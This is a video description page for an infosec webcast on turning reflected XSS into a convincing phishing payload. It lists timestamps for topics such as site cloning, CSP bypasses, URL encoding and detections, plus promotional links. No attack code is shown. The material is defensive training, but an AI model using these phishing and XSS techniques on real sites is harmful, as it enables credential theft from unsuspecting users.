A Journey from Alert1 to P1: Cat Pic Graffiti and Phishing Payloads | Cary Hooper скачать в хорошем качестве

A Journey from Alert1 to P1: Cat Pic Graffiti and Phishing Payloads | Cary Hooper

🔗 Join us in-person and virtually at our Wild West Hackin' Fest: information security conferences — https://wildwesthackinfest.com/ 🔗 Register for Infosec Webcasts, Anti-casts & Summits. – https://poweredbybhis.com Tired of taking screenshots of alert boxes? Join me for a working session to discuss how to use JavaScript and DOM manipulation to craft a believable XSS phishing payload resulting in code execution in a target domain. Today, I am hosting a learning session to show an approach for turning a reflected XSS bug from alert(1) to P1. This includes a live demo / working session to turn a target domain into a phishing page (and maybe some cat pics) and a discussion about how to turn that into a shell. Attendees are encouraged to follow along in their browsers. Following this session, you will emerge with additional knowledge of (1) manipulating the browser's DOM with JS, (2) CSP Limitations (and bypasses), and (3) a methodology for how to turn XSS into a phishing payload from scratch. 🔗Cary's GitHub (slides, CyberChef recipes, etc.): https://github.com/caryhooper/present... 00:00 - Welcome, intro 00:22 - Preview / Level Set 00:50 - We’ll be cloning a website 01:19 - Disclaimer 01:33 - Agenda 01:43 - Whoami 02:28 - Aert box is not enough - need POC 04:59 - Alert (1) does not communicate the true risk 05:46 - What to do with XSS besides popping an alert box 07:28 - JS Doom injection 09:02 - DEMO intro 09:30 - XSS Example 12:49 - Career Opportunities Available 13:53 - Attack Tools 15:22 - Why users trust cloned sites 16:30 - Everything can be an API if you try hard enough 17:09 - INFRA Diagram odf attack 17:39 - Social Engineering Toolkit (SET) 18:11 - DEMO: SET 19:08 - Limitations 20:08 - root-me.org 20:46 - Easy stuff is likely to get you caught 21:29 - Content Security Policy (CSP) 22:08 - TOOL: CSP Bypass 24:00 - Other cool tricks 24:37 - DOMContentLoaded event 25:02 - DEMO 26:34 - Cleaning up with CyberChef 28:15 - Troubleshooting page appearance 34:22 - URL Encoding - why and how 36:06 - Failure and investigation 36:32 - Crowdsourced solution 37:22 - Re-URL Encode 37:44 - SUCCESS! 38:53 - Detections 42:15 - Summary 43:36 - Career Opportunities Available 43:50 - Q&A - Resources for beginning web app pentesters? 44:45 - Q&A - Why do manual URL encoding with CyberChef? 45:11 - Q&A - Where to get CyberChef recipes? Git. ///Black Hills Infosec Socials Twitter:   / bhinfosecurity   Mastodon: https://infosec.exchange/@blackhillsi... LinkedIn:   / antisyphon-training   Discord:   / discord   ///Black Hills Infosec Shirts & Hoodies https://spearphish-general-store.mysh... ///Black Hills Infosec Services Active SOC: https://www.blackhillsinfosec.com/ser... Penetration Testing: https://www.blackhillsinfosec.com/ser... Incident Response: https://www.blackhillsinfosec.com/ser... ///Backdoors & Breaches - Incident Response Card Game Backdoors & Breaches: https://www.backdoorsandbreaches.com/ Play B&B Online: https://play.backdoorsandbreaches.com/ ///Antisyphon Training Pay What You Can: https://www.antisyphontraining.com/pa... Live Training: https://www.antisyphontraining.com/co... On Demand Training: https://www.antisyphontraining.com/on... Antisyphon Discord:   / discord   Antisyphon Mastodon: https://infosec.exchange/@Antisy_Trai... ///Educational Infosec Content Black Hills Infosec Blogs: https://www.blackhillsinfosec.com/blog/ Wild West Hackin' Fest YouTube:    / wildwesthackinfest   Antisyphon Training YouTube:    / antisyphontraining   Active Countermeasures YouTube:    / activecountermeasures   Threat Hunter Community Discord:   / discord   Join us at the annual information security conference in Deadwood, SD (in-person and virtually) — Wild West Hackin' Fest: https://wildwesthackinfest.com/